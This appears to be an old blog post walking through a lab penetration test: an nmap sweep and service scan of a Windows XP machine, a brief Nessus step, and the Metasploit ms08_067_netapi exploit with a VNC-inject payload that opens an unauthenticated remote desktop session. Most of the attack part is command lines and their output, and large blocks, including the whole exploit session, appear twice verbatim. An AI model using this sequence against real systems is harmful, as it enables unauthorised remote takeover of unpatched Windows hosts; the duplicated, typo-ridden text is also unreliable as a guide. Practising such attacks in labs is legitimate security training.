Information gathering & service enumeration
scan network 192.168.43.0/24 using nmap
root@bt:~# nmap -sP 192.168.43.0/24
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-28 04:09 WIT
Nmap scan report for 192.168.43.1
Host is up.
Nmap scan report for 192.168.43.2
Host is up (0.00053s latency).
MAC Address: 08:00:27:5F:74:EC (Cadmus Computer Systems)
Nmap scan report for 192.168.43.254
Host is up (0.00077s latency).
MAC Address: 00:50:56:F8:58:F4 (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 7.87 seconds
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-28 04:09 WIT
Nmap scan report for 192.168.43.1
Host is up.
Nmap scan report for 192.168.43.2
Host is up (0.00053s latency).
MAC Address: 08:00:27:5F:74:EC (Cadmus Computer Systems)
Nmap scan report for 192.168.43.254
Host is up (0.00077s latency).
MAC Address: 00:50:56:F8:58:F4 (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 7.87 seconds
root@bt:~# nmap -T4 -A -v 192.168.43.2
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-28 04:14 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 04:14
Scanning 192.168.43.2 [1 port]
Completed ARP Ping Scan at 04:14, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:14
Completed Parallel DNS resolution of 1 host. at 04:14, 0.78s elapsed
Initiating SYN Stealth Scan at 04:14
Scanning 192.168.43.2 [1000 ports]
Discovered open port 139/tcp on 192.168.43.2
Discovered open port 445/tcp on 192.168.43.2
Discovered open port 135/tcp on 192.168.43.2
Completed SYN Stealth Scan at 04:14, 1.19s elapsed (1000 total ports)
Initiating Service scan at 04:14
Scanning 3 services on 192.168.43.2
Completed Service scan at 04:14, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.2
NSE: Script scanning 192.168.43.2.
Initiating NSE at 04:14
Completed NSE at 04:14, 0.17s elapsed
Nmap scan report for 192.168.43.2
Host is up (0.00052s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5F:74:EC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat:
| NetBIOS name: H-C5FF0122DAD84, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:74:ec (Cadmus Computer Systems)
| Names
| H-C5FF0122DAD84<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| H-C5FF0122DAD84<20> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.43.2
NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.57 seconds
Raw packets sent: 1103 (49.230KB) | Rcvd: 1017 (41.234KB)
second steep
Vulnerebility using nessus
first scanning network 192.168.43.0/24
press launch scan it's will running for scanning vulnerebility
press scanning target
now press host 192.168.43.2 and will see vulner about that host.
so i will exploit smb for information from smb.
for see all repost vulner u can get from this link.
https://docs.google.com/open?id=0B-KNbh5PxtuaOTFiMzRiYjMtZWFkYy00MTE4LWE2NTktMzk5NzY3ZDkxNjVl
last steep
msf > use windows/smn/ms09_001_netapi
[-] Failed to load module: windows/smn/ms09_001_netapi
msf > use windows/smb/ms09_001_netapi
[-] Failed to load module: windows/smb/ms09_001_netapi
msf > use windows/smb/ms09_001_nestapi
[-] Failed to load module: windows/smb/ms09_001_nestapi
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
payload => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.43.2
rhost => 192.168.43.2
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.43.2
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "h-c5ff0122dad84"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
this target open by vncinject.
@keep smile & spirit
be fun
https://docs.google.com/open?id=0B-KNbh5PxtuaOTFiMzRiYjMtZWFkYy00MTE4LWE2NTktMzk5NzY3ZDkxNjVl
last steep
exploit
open your msfconsole (metasploit using console)
you can open msfconsole from termilan tupe msfconsole ant it's will open.
msf > use windows/smn/ms09_001_netapi
[-] Failed to load module: windows/smn/ms09_001_netapi
msf > use windows/smb/ms09_001_netapi
[-] Failed to load module: windows/smb/ms09_001_netapi
msf > use windows/smb/ms09_001_nestapi
[-] Failed to load module: windows/smb/ms09_001_nestapi
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
payload => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.43.2
rhost => 192.168.43.2
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.43.2
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "h-c5ff0122dad84"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
this target open by vncinject.
@keep smile & spirit
be fun
Cool!!!
BalasHapus